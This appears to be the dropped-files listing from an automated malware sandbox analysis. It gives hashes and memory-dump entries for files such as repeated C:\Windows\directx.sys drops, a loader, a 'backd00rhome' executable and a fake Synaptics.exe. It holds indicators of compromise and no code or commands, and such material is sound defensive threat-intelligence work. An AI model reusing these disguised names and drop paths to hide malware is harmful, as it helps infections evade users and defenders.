MD5 4cb71ebef755fb064c648dd98a981b6e
SHA1 60a847973ba4b39731def0709f590185ade16621
SHA256 53e7dcb0046c62c840a34b5c6f01a086746d29261fe8347204c304ac8cd66905
SHA512 529d769c056e76472caec4176f00411c1c265283629f2d83e89f07d3f8b7f626cbd309260f5aceba811f276a912b215efe5be1bfc2121aa6c9582a1b5e6f2cff

memory/4708-1791-0x0000000000080000-0x00000000002E1000-memory.dmp

memory/788-1790-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/1080-1792-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

memory/1080-1793-0x0000000005E00000-0x0000000005E4C000-memory.dmp

memory/1080-1799-0x0000000006F90000-0x0000000006FC2000-memory.dmp

memory/1080-1810-0x0000000006FD0000-0x0000000006FEE000-memory.dmp

memory/1080-1800-0x000000006EF30000-0x000000006EF7C000-memory.dmp

memory/1080-1811-0x0000000006FF0000-0x0000000007093000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe

MD5 34a152eb5d1d3e63dafef23579042933
SHA1 9e1c23718d5b30c13d0cec51ba3484ddc32a3184
SHA256 42365467efe5746a0b0076a3e609219a9cffe827d5a95f4e10221f081a3bf8fa
SHA512 270298ca39c3ff0ab4c576374a5c091135efad3c1cb9930888a74ef7d421f43039c2545eadecb037fcff2b8ee4e22cd4d809b19e7958b44ba1c72100135a46fe

memory/1080-1820-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/1080-1821-0x0000000007130000-0x000000000714A000-memory.dmp

C:\Windows\directx.sys

MD5 ff279068a711976404522563df5c3beb
SHA1 69e5735b9e63ea4dcb5b92a64448ac820bee5196
SHA256 b6681f47408abe739433a52aee73a58bc1ef637641d4697598a6254168652637
SHA512 8a5aa05b140f00387c308555a0e267b629a64cdce2b47aa884d5a00bc758713a7bb4b348920d81a2eadede67f43db5f3c20c3ef63f9d047dae7d707734ad5720

memory/1080-1835-0x0000000007190000-0x000000000719A000-memory.dmp

memory/1080-1836-0x00000000073A0000-0x0000000007436000-memory.dmp

memory/3360-1839-0x0000000000A20000-0x0000000000EEC000-memory.dmp

memory/3484-1862-0x00000000076A0000-0x00000000076F0000-memory.dmp

memory/3484-1863-0x00000000078D0000-0x0000000007946000-memory.dmp

memory/3484-1864-0x0000000007950000-0x000000000796E000-memory.dmp

memory/4248-1875-0x0000000005730000-0x0000000005A87000-memory.dmp

memory/4248-1877-0x0000000006300000-0x0000000006322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1002824001\90b1cecd19.exe

MD5 6a3268db51b26c41418351e516bc33a6
SHA1 57a12903fff8cd7ea5aa3a2d2308c910ac455428
SHA256 eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c
SHA512 43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33

C:\Windows\directx.sys

MD5 52d34d5cc6f04c79f137a32847149b09
SHA1 7c99b81eb63b272fef8f71d7b05e610f637cde13
SHA256 bc0da89e3910714b5ea5610a08beb393e52b49e7665f968e3543eaacda259b1a
SHA512 f343e92f4196bb5d16ea7eac781fb13b5b4b4b375a0ea7650d80ee01bbd4796b3c75e23d32741c96d3d7d299e20219df54532393edcc04c40ca80de06089d97b

memory/2188-1928-0x00000000001B0000-0x00000000004AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe

MD5 c07e06e76de584bcddd59073a4161dbb
SHA1 08954ac6f6cf51fd5d9d034060a9ae25a8448971
SHA256 cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9
SHA512 e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

C:\Windows\directx.sys

MD5 0b83a158bc72c093d99c390f94bbf942
SHA1 3242eb5ba601149238cf28f3a5d168e7dd9aed6a
SHA256 fcda7bfebd4b117f185004cac008f130936cbc732cfc69e2a781f22dc5c2566a
SHA512 41667c90e5366c8136655a077a27ea71db9a3f1a195d1bd48c93d9cc5b67fb34d425c502b4955a9e91bb443f3c3bbd752537b50f06a0af400f4d866b65cfff1c

C:\Windows\directx.sys

MD5 15ebecc758ff08b09c1ce084f05ad69f
SHA1 ccdd4cfc9113b3d2e84e692cd2ca8e592fe7db6a
SHA256 b504604dd5484579e4e6858ef73cb0686e3a969eecb4da177943e0fc84d512c8
SHA512 ff6c6483f8ad833a9045e269bf6266b0e7ddea1635fbbafc7d14e11f2c1d5766012dff243d30977836ca8fca2eb5bbb59bbff83a028c05fe6fdbf4d7d82ba6e4

memory/3484-1965-0x00000000091D0000-0x00000000091E2000-memory.dmp

memory/3484-1964-0x00000000077B0000-0x00000000077BA000-memory.dmp

memory/3620-2008-0x0000000005EE0000-0x0000000006237000-memory.dmp

memory/2188-2019-0x00000000001B0000-0x00000000004AB000-memory.dmp

memory/3620-2029-0x00000000065B0000-0x00000000065FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

MD5 59a9510540fec35043b990deb270b139
SHA1 54d66862a4c08ebcba8029ec99d558725603f486
SHA256 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
SHA512 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06

C:\Windows\directx.sys

MD5 13426aac4abbd498165bdbf1bcbca346
SHA1 3987260670fd4d9aaf26183ea8cd12ce97a3067d
SHA256 9646a15357fd72ada4b40fee9e978865870a83a842182512851a7e6f847f3b26
SHA512 ee48ef42a9c893d81e4b1e5da297ddf15de085a93aa804846b31acef92d185fc4f97cfd47d7aa2c9b14e0381b8c49c4a149e163dbb2a2863f3f81b32734606b1

memory/1276-2046-0x0000000000D90000-0x0000000000DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe

MD5 2fe92adf3fe6c95c045d07f3d2ecd2ed
SHA1 42d1d4b670b60ff3f27c3cc5b8134b67e9c4a138
SHA256 13167320a0e8266a56694be70a9560c83e2c645d6eeaa147b9ae585c2960ebb2
SHA512 0af7b4a3ce3981707ca450b90829a4a8e933ea3cd3affbce738265a1a0647e96323117db325d0e5e3884f67f36b21b8c955b6c3c6dda21d9b01212e28ef88d65

C:\Windows\directx.sys

MD5 e86df8ab91b93361ace8d269bf0cfd04
SHA1 c2facf14233781bc73c701d8d9d1f361a8f1b214
SHA256 98288e886d52067e31bb443e155eebc87b92c7d094c42357ac2097ae7d3264ef
SHA512 dfdf60ca05adba7194f5f4b6cdb104eb8a58edb10838f6c5255c6d2aad7e5cfe6f0c5cc11e41093164bb1e628445496fabbbc910af12e5dd46665463f50e7f65

memory/3484-2091-0x0000000000090000-0x0000000000C58000-memory.dmp

C:\Windows\directx.sys

MD5 9e06cbaea528ed37c8d88cb88a27a9ff
SHA1 8c6863473edbbe39d692ede22a57d09076bd40e1
SHA256 fb23916ef2ef95cabf567d35d79de3209bd357967bbe1aac618b684d06f4ad36
SHA512 b9ea6e2ef1e35be7ee1e2782452ff4419787792299b30cfd7adf9b37dc6d92d3e6ec36040e6320822e405c7fafe7f79d05975b8430af113041d1726a9bf90754

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 58178700e2f7914aedfd11fb577a63a0
SHA1 87c773a2392c142bb5b4e5db73be7103f45cd82f
SHA256 33912895c35a081e4995bb6f9974c04a6b00f529514cab23b181bf72704df4f6
SHA512 3d4f92594fe876b39c0d2e79a2f6f254cf93037a6ecda2d9e51f039e21c11c51bf2fdb2e141ed52d048036c4397c1d288d6c6f59b5709fd6d8c1c780d9c18999

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 daa8f67a577d6952d844ed0bc9fcb106
SHA1 c9339419695645a02130b1bc8490abe64765fcb4
SHA256 1679137361d5696d0421c2ac15b56963d00e684635d3d004c42daf26c6dee4ef
SHA512 d7fe0ad63ee68cb7c75456ca5ccf7e8aa8986bf188b5fd9659e4ce3b8e6645eaa028adf3f07dc0377455dbf006e56da7242dbdd68b326d79ec43be5c12559473

memory/3220-2205-0x00000000065B0000-0x00000000065FC000-memory.dmp

memory/3712-2227-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

memory/3220-2237-0x00000000075D0000-0x0000000007673000-memory.dmp

memory/3220-2217-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

memory/3620-2239-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

memory/1624-2250-0x000000006F0B0000-0x000000006F0FC000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe

MD5 b3834900eea7e3c2bae3ab65bb78664a
SHA1 cf5665241bc0ea70d7856ea75b812619cb31fb94
SHA256 cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce
SHA512 ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909

C:\Windows\directx.sys

MD5 a5f9082adf4db96426c657ca60f6809a
SHA1 aa2d0e0a6342710a98605636e07ad6fe41b0e27f
SHA256 73a9f3e1fe8b0984d08acf309e5ccbc7f717b42ea5251f712b8da8f33926f8ad
SHA512 50d0a7280b12ca0dac36b35c13576a1d3e5b5bed9ccd079d2d3b0a34db8462f7b7b61f20e72612b65b6c2dc613f3a970bd33c590cc59033ed6bb7894877e6484

memory/2252-2532-0x0000000000400000-0x0000000000AD0000-memory.dmp

memory/4708-2550-0x0000000000080000-0x00000000002E1000-memory.dmp

memory/2252-2568-0x0000000000400000-0x0000000000AD0000-memory.dmp

C:\ProgramData\AMMYY\aa_nts.log

MD5 9e5a8822fe99336922970cf445a46470
SHA1 5dbc6fa3264249ca47524fba6f2942f9abbd7ffc
SHA256 97ba8549d7cda421592a621ced0a7bfb22bdbee3e47630019f9f7747af810d12
SHA512 3129c3e217a5415823c4680a58f96db8b8d5611c80d314f7fbb45d52889bfa3a2a0b690b9ac9c4286336c5fca6cde67ec1394439f3fbf0a80b7fbe377a416a2d

C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe

MD5 7b5e89271f2f7e9a42d00cd1f1283d0f
SHA1 8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f
SHA256 fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a
SHA512 3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22

C:\Windows\directx.sys

MD5 93f0dc7a8d6f9ca9030fa2b648da15af
SHA1 208cd7fa780028d83e386cc35d025f413553f8e4
SHA256 99c2e0ba313cb7775a9676b0c070204ab5efb3cecfd6086dfb7346c0caaa0855
SHA512 ce5021d45a5f24315d7b1b92ca17b34b12064d919082aa9070a6a7a39abb5a707a87e8f6967b6667abab129b13def7bf17cf5e2a1faf939d2bb467bda3b940df

C:\Users\Admin\AppData\Local\Temp\1004192001\zq6a1iqg.exe

MD5 fd636191c054ea1e9f60d45bb50eaafc
SHA1 351cda4cd5f58d474126f5a60f92d4296f28121e
SHA256 d8efa36e63e09c7999fa217695f94d05e6ba642588f5a9c8f5807c8c816b93c1
SHA512 0e4c0f02081bc77115479f136aa2bbd5a8ec6f1d83119b74ceec3a3ee98116c1557623328095a32fd99d380b9f43b519933e307f333f5c6b927774587fb07436

C:\Windows\directx.sys

MD5 a3ff7597316d1d28ef00e3169a122e75
SHA1 73a485924da02640d7e0cc787dd9be6441d45b06
SHA256 730e4de956166d32eb46d9d15719f975afb2b755fa6c7bdd6ae4f6026b6bb117
SHA512 5400dcbb810e3725acec47cb3b1c24d08271c0bd685e36c3f2849b4eaf63a3b6c102ba1109fb593b39b895b166bed0f88bac733cf2ac4efbb482420807eadcdd

memory/3788-3139-0x0000000000050000-0x000000000029E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1004411001\c4d922dfc8.exe

MD5 7b61c4450718e164ef24eeaa347876b3
SHA1 7dd322d0cbd66ba5732421c0829b9de2ca93c3a8
SHA256 12118dc0b2fdfab013e7bb8c8d2f8525fe09d738f82277811cb8ba6515b9c012
SHA512 6b0e3e61fb0dcada99996b3a30a6880c18b9a222a95d46a9008fd1fb6a7c5df8a43fd430fd4c0880a0422ec1d0ec29fd28e566f13e24ccbf3c027fd2306be6ee

C:\Windows\directx.sys

MD5 301a88827fc6014c82abfaa047b4df9c
SHA1 b63dbda1d8c6a426400215ba544432094532851b
SHA256 6e5fb109a6939cd3eeb1bb395a83ff4e1dc5ca0026f9686c10e252623bc8bdd0
SHA512 c2629a1033257d9549cc1caccfb8bb519b2b4c0b4d3465c55f76ae4ce7e9d0856d4945e0ef5272568fdf2fb02913b229f559021179f13085f57e0fc9a292100f

memory/4712-3207-0x0000000000E00000-0x0000000001481000-memory.dmp

memory/4712-3235-0x0000000000E00000-0x0000000001481000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1004412001\b6b0ba96bf.exe

MD5 b7f493cfc8681282fffbb4ed0813a470
SHA1 7886d311595a551786307a1542fbef74265ba88a
SHA256 3cffd3d15cacfae9a60ad6bf2ddde8468f07a852402004d3bc8043b2489f7953
SHA512 535073ab85d9a46a8addd6027e79d4778fa1453f6d903763e18e429b1cb513de1b60fb410bc320d7de1a91f8c36ed68a9037b87300b4f8900f74523e971410cc

C:\Windows\directx.sys

MD5 c73946eb3d77982ba5b697d3faf6991d
SHA1 435eac1156e91c84a16f62c3dcb3b9cf73099b21
SHA256 e22c9edce75f8941b513f315e19e0d71d24ca7855b28eeec49d5d373ab43310f
SHA512 2e9d62f824f5eb1326bd80b68d9b75ecd1edfca392afd4155505dfac153370dd3123db858d943de3d9ea9ca117092c60c0673aa99fc9b231c155078ab63f138c

memory/3788-3438-0x0000000005200000-0x000000000540E000-memory.dmp

memory/3788-3441-0x0000000004C80000-0x0000000004CA2000-memory.dmp

memory/3788-3440-0x0000000005410000-0x00000000055E0000-memory.dmp

C:\Users\Admin\tbtnds.dat

MD5 6147c7ed5cace95256226438451931fe
SHA1 51fdc22437f4f64e1332d7510036223976aefef7
SHA256 5c0458327b3175f7209566aa0bc4dc90999cdd802c1304ef933b3acf088f18e7
SHA512 a84ef91a1d80044797b5b0c219ec7d7f0c9fda726d6d32c838032aaff1a4dc11a9be3bbc733f309a5e4521fcfb6389ae6cac5308a4f3f1efcfdc020b3f8e7318

C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe

MD5 2e0af351f63d046026cea2616654f05c
SHA1 78c58cd85e76d489607c0ecb4e34fb08d47dc2c2
SHA256 acfe487c53dc359b3d0e6c78d8a063c5426b09470e161f26d6f27b97fe5b6623
SHA512 1534d56c2d5d419e67e375be30039d28c6e6854415eb79f7a5705639d77471f2899791402313e0ac508351f9f777d57f0bfc25ec027bab70c7af5dce212a5661

C:\Windows\directx.sys

MD5 52edfc40284d0bb61841573f62660b74
SHA1 17c8d1e7162a8f6b65b16e47e1887182f15a599d
SHA256 772781688958a8c40beb2aa94494367822a3d40c783dc15cf82d33ed32bc07a4
SHA512 3e2cda4b5638c5fdac062fae2ece60e3ca9036293d38bb149b7cc638cf6ee57ca91799626e14820df67a964621ff06677c0e56a572b5d165212e711185a725cc

C:\Users\Admin\AppData\Local\Temp\Files\backd00rhome.exe

MD5 ef397426691bc35566bc401598e10d60
SHA1 40ac43354d2ea80706dae6a60ce5cb668ba35514
SHA256 ec34977344bded135083b97756df058d33565bb80a1ab48cccb82999a6b340cf
SHA512 023009d6a0b923d582a84a6db93b4b4a5c8017ef2217937490e83df801c56b12a962ba88ec4f28bb1fc2aee7ad393d8c93bd097e27b969f061876ac85339e746

C:\Windows\directx.sys

MD5 0df9d88ed712840229bac062e768645b
SHA1 a92673436bdf064fe89552424ed26a764ab1f8a0
SHA256 4dc8e151103fc5e509c882129f19118a40f5af63b9e5e18112aeac8955558ed1
SHA512 96ef9d82a87799a2f5588aacd0f0c870b073c59e7641b567bda6158eb03b1e62fb617f0eec9dca36604bcdf5ed3fbb799f47323b06df170af34e667831c71f89

C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe

MD5 88783a57777926114b5c5c95af4c943c
SHA1 6f57492bd78ebc3c3900919e08e039fbc032268a
SHA256 94132d9dde2b730f4800ee383ddaa63d2e2f92264f07218295d2c5755a414b6a
SHA512 167abcc77770101d23fcc5cd1df2b57c4fe66be73ea0d1fde7f7132ab5610c214e0af00e6ff981db46cd78e176401f2626aa04217b4caf54a249811bbf79d9c6

C:\Windows\directx.sys

MD5 7d3b4766b3a797695752c5fb0f081297
SHA1 2230c67e7d65ba3af1daa7ce9f59b0498eac0e94
SHA256 ed2b4e3eb13976d508a921f1aff9ee83cb91697a444605c21f809d57f5655c2d
SHA512 e4cc4bec96e4c13950c21fb4403f08c5d643915ae502a4b36c8ddd6fce1c5cbe5ed739d2e456e82d9fb35810a944ea93aba9f3ea522e7bc682eb0d9a82766749

C:\Users\Admin\AppData\Local\Temp\513022960.exe

MD5 cb8420e681f68db1bad5ed24e7b22114
SHA1 416fc65d538d3622f5ca71c667a11df88a927c31
SHA256 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512 baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

C:\Users\Admin\AppData\Local\Temp\287511317.exe

MD5 96509ab828867d81c1693b614b22f41d
SHA1 c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256 a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512 ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

C:\Users\Admin\AppData\Local\Temp\154057176.exe

MD5 c38ea1b0838858f21ea572f60c69de0c
SHA1 f5e34c47b0630056ba00df97641926f9579b384a
SHA256 cae7ef69cce550af020bfc474c6e035882383b022d63e926c52bd8c3ad1d78e4
SHA512 f9c55f31b9466c412711462322c167aadb72492d70fe5fe89ab5500b86eae8f42de29bc3e469b3f73eab9dd47061b51410d5bee444da0bad719c94c897c59d72

C:\Users\Admin\AppData\Local\Temp\Files\test11.exe

MD5 2340185f11edd4c5b4c250ce5b9a5612
SHA1 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727
SHA256 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031
SHA512 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c

C:\Windows\directx.sys

MD5 9004aaf4c8aa0c451cb3577abcf93cca
SHA1 741f084178be603b1dc21f8de09d7162c9376460
SHA256 803c2be615cdc0d9278326f35c2ea36259f4c632ce8733331c8b0aef4109e358
SHA512 2cd0a00cf3ffe3a93401b16305d647b9716d7c6a187a2ba47413737488edea0cb05e28fa7ca3921eb20d8ab46ae24cf9901ca1e80e22f9f4c395a3af510b3f1d

C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe

MD5 fd2defc436fc7960d6501a01c91d893e
SHA1 5faa092857c3c892eab49e7c0e5ac12d50bce506
SHA256 ba13da01c41fa50ec5e340061973bc912b1f41cd1f96a7cae5d40afc00ff7945
SHA512 9a3e1f2dc5104d8636dc27af4c0f46bdb153fcfada98831b5af95eeb09bb7ef3c7e19927d8f06884a6837e10889380645b6138644f0c08b9cb2e59453041ec42

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe

MD5 dd4f9e2e3a884356b781bc7085c81fe7
SHA1 b22baae11f42f5091bb9e8c68e37c70ed73bcf27
SHA256 44ea7026de94c08fe8fb19cf6c659f571afd12ef5f6b4cc5c1e6b0ea50e10a39
SHA512 b02f0f07b6376ea8793498bce77c7150812d691117e5bed8d25a2dbceffc1b51df39896b398b24980767acb9952b299f054faf9622911d637639784e81e21b7e

C:\Windows\directx.sys

MD5 d4158538459216a49005f13522287ab4
SHA1 1561a8ff857aeff922ad312a433b82d05bd0f811
SHA256 9ab2b7626e4ed628c98c8a0627d69f70890ad9b7c12da6ee085f4732c99610ae
SHA512 101af0b96b60b0c1725c9eb56c96591325cd674e59bfdbf7a5a97952f9ff0482005908986b904b2dd2dfb1a4472ab4e1eb66704403aa2082be3594a3254260bd

C:\Windows\directx.sys

MD5 02b4435638707096118cf856ba8c9e07
SHA1 53649cee68d14ce570450cd0888dcacd0fa91260
SHA256 5ee5d469976feca168eb09d215accf0ec60fb692621eaef2df92ada3ee08aa2e
SHA512 62049fdf1f4ffe897cb4cb0e7c461f183402707aee6f001037b4c35f4e3bcc1e60cd55126abc41e2cb29d4c1ddcedd55fe4b26376bc9357a65733d82e8feabf9

C:\Users\Admin\AppData\Local\Temp\520429473.exe

MD5 83a784716728ca579619d0e13a9f17b0
SHA1 5e33ca9dab3c0df2edcd597b8b0da06c88f18f6b
SHA256 9dc0b007f33f768fff2249388428981d89cfcee3e5babd206bbaeb7d5cc34b4f
SHA512 f8218a8e977f0ec340e7139041cfff8bac4cc23bcea0c0c0d7717ead76093d45d10acd72a5846486e9348ce642f529824f1575d0d28b8d2f566c543c7c9d3bc4

C:\Users\Admin\AppData\Local\Temp\Files\AdaptorOvernight.exe

MD5 e0d29de6e2fa7590f857f1ef825c943c
SHA1 5d4166175a6aeadad97a01f856856cc87a482311
SHA256 47fa886618e66e730a11f7a37be8ab0371709624a0ad26e7370c0220bdd4786d
SHA512 190c08889a5085bc38d8cc8689eb6dc461338f80496cda05068b20940053a4df6330a35ae651c8cdc325e090a87b5b097dfae7ead64d39dda3cca1a03fedba5e

C:\Windows\directx.sys

MD5 0c9dc2bd3c511fc4a321970c73f52420
SHA1 4d30534848e588b4f0dc61fefb94fde801f71e2f
SHA256 1b8bdf1de551c7988c135cd845ba45c777e544eefa2eee0298840aa8c9a43874
SHA512 a759f2d457def1f3be15c820b9246288fd027cc6b14b0112f3e08b1d91cb36132b4b19e59995dcb87b5ecdf6642553e18ca1b65fdb408627fa23443bc5ee19b6

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

MD5 9b8a01a85f7a6a8f2b4ea1a22a54b450
SHA1 e9379548b50d832d37454b0ab3e022847c299426
SHA256 3a8d25489569e653336328538ff50efcd5b123ceeb3c6790211e2e546a70ce39
SHA512 960ba08c80d941205b1c2b1c19f2c4c3294118323097019f1cfc0300af9c8f2c91661fa1817a5573e37c0cdf3cae1f93c91b2934353709999c9efb05cda2130f

C:\Windows\directx.sys

MD5 020c633b2f3813a6a41c536b9b00fba2
SHA1 1af40a264a53272f8a675234807b394b7c954579
SHA256 5e8984758fe67646cbbd5c987d2e043881ffac8c1cc131349962dfd588219312
SHA512 870954f5026c7e7c01a53b3e1a876cb162b7351e33b445c3c6c4d92903d501c646cdde1a910a20fa3d903745996141ff9b7b792fbba3030761ad4dff05fe3e48

C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.ba\SideBar.png

MD5 ca62a92ad5b307faeac640cd5eb460ed
SHA1 5edf8b5fc931648f77a2a131e4c733f1d31b548e
SHA256 f3109977125d4a3a3ffa17462cfc31799589f466a51d226d1d1f87df2f267627
SHA512 f7b3001a957f393298b0ff2aa08b400f8639f2f0487a34ac2a0e8d9519765ac92249185ebe45f907bc9d2f8556fdd39095c52f890330a35edf71ae49df32e27a

C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe

MD5 833d7b73767607cd76c0c81dcc1c5f75
SHA1 6ad561dcfcdea749d2f7d3fc96fca99d7f6fe592
SHA256 abb2e915cae562e527cd773e5b399d993634331ad29bea029cc2048ae239fbda
SHA512 33dbf44e6dd06fdf114628d8c34fb7eea13f5cfe3a1a461b76dc0ae0dfde7ba4b17e0835d75fd6a5990893c541f2f3d3781bd80449c42a8a894a1eeb10bda7d1

C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe

MD5 eb2e78bbb601facb768bd61a8e38b372
SHA1 d51b9b3a138ae1bf345e768ee94efdced4853ff7
SHA256 09d97363cb679a12a09d9795569b38193991362c3b6981d7154b17d34f36f8cf
SHA512 5c2ce80953a39393a6a63c772390709e2140bf9b7e7a7765767bc5ae6fb27e52fa7f9237a918dd8060a83667f29ed47e12adef26127f183bea58859e93c3b9f4

C:\Windows\directx.sys

MD5 b870f33192c7bbc1beaaac72a4591b65
SHA1 b33cd62acf957e6b11895dfc528593b7815b684c
SHA256 333eb244f5f14057dfa08b14d001faaa5c1960d8942097802b799cd6ec5bc6e4
SHA512 36a2a38222434efb04c33ff0a760adeddb0b692e1cb597faab7406b2f23db94ec6d741fedf6bb7dcb5477463a6d1b2fa26f87a83cbde3586c50b8b1dc03dba65

memory/2792-5585-0x0000000000810000-0x0000000000818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

MD5 3d2c42e4aca7233ac1becb634ad3fa0a
SHA1 d2d3b2c02e80106b9f7c48675b0beae39cf112b7
SHA256 eeea8f11bf728299c2033bc96d9a5bd07ea4f34e5a2fbaf55dc5741b9f098065
SHA512 76c3cf8c45e22676b256375a30a2defb39e74ad594a4ca4c960bad9d613fc2297d2e0e5cc6755cb8f958be6eadb0d7253d009056b75605480d7b81eb5db57957

C:\Windows\directx.sys

MD5 cea38347dfd84253c90b7d7d77b2ce99
SHA1 4b07ed3f30824d4500b3eb858801219b7e390aa7
SHA256 681b777f08ac59a41687fe714db2412057030e74ba3af545f4f297d3bf783560
SHA512 038714f92cb02b61c9767561818f977bf11f1c9c44b0a47cc3b772e1737e41f59e20d8bf0bd667ab17df1157dadeb69e3e6be16a852872299864f1726a0bcd5c

C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe

MD5 44e17821665477b21d6c50cee97c84ef
SHA1 4fc146790747758f49f1fd4375144f000099a6cb
SHA256 5adac427a6eff8b0c1674c6095e2719d5ee46945fd4e397384af02b8ec691045
SHA512 ab98a8151b41b56d7e59c375541c366df2f83c01ee26a5d1f079f74fb69eac4d229df62d3900eb8db6fd8cae1e420c21b7b9b2b3a44a8b135cb6659b6b70b6dc

C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe

MD5 8c423ccf05966479208f59100fe076f3
SHA1 d763bd5516cddc1337f4102a23c981ebbcd7a740
SHA256 75c884a8790e9531025726fd44e337edeaf486da3f714715fa7a8bdab8dbabe3
SHA512 0b94558cbfd426300673b4d98e98a9408de236fe93bb135fa07e77ee0851621bfc9a5129322f31c402a606ab1952eb103de483c3b48a86c3225318d98f78bc20

C:\Windows\directx.sys

MD5 f881efefaf9160053b058d38c3839c66
SHA1 4cf3a30cc6cd1dbee3faf118cffb8b935dc41b6c
SHA256 c8425fe24e7990fe55a744130afa951ff4bbb54239a8488d41e99bc7b0d54eb2
SHA512 3268852d0f1c78966481f7e34592db916c659d7f3e1177774daf144e4953a05139ce645dc0d1764432d7b9ea94758c96ad93e6b5ae1ce148a356277d8c4ba7a1

memory/4604-5965-0x00000000002E0000-0x0000000000332000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp6FB0.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\ProgramData\Synaptics\Synaptics.exe

MD5 075045f176129f6b11d627db7c7a3c76
SHA1 d815d313d2882041b8adb063eda6a8bd62149443
SHA256 86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8
SHA512 86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b856d79054d0c3bba9d112f22f3d13cc
SHA1 5c1912baaa6d5c248a71bc69e3e47dc063c4c262
SHA256 df6e2dac1342ec7d84bb1bc62a5208b8180c17a65871e941a76394e54bf7a3d9
SHA512 5b9c254e940a2343da74d2ff2ab199dbe006c4fcb7f764469ef6fe32d32fb7ef9b730330b931297f0cd5127deb3272b9498c3d62d33a7354e977c1289dec6158

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 93461b35879f6b1ee1a30044179ec58f
SHA1 1d9975cfb968a4e3f419cf1bf620a764ac77fd51
SHA256 0c9065be1f6aeb056503bdbd9dcc6077317789e3bdbee33b64d0fa00468cc98a
